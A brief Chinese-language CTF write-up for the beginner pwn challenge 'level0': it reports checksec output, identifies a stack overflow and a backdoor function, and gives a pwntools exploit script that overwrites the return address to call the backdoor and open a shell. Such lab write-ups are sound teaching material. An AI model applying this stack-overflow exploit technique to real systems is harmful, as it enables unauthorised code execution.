题目地址:https://www.aliyundrive.com/s/uKW6ZjVv2yo
pwn0
先checksec一下:
发现只开了栈不可执行,放入ida发现漏洞函数和后门函数
于是这就是简单的栈溢出题目,简单动态调试一下就好了
构造溢出栈图
exp.py
from pwn import *
elf = ELF("./level0")
io = process("./level0")
io.recv()
callsystem_add = elf.symbols["callsystem"]
payload = b'A'*(0x80+8) + p64(callsystem_add)
io.sendline(payload)
io.interactive()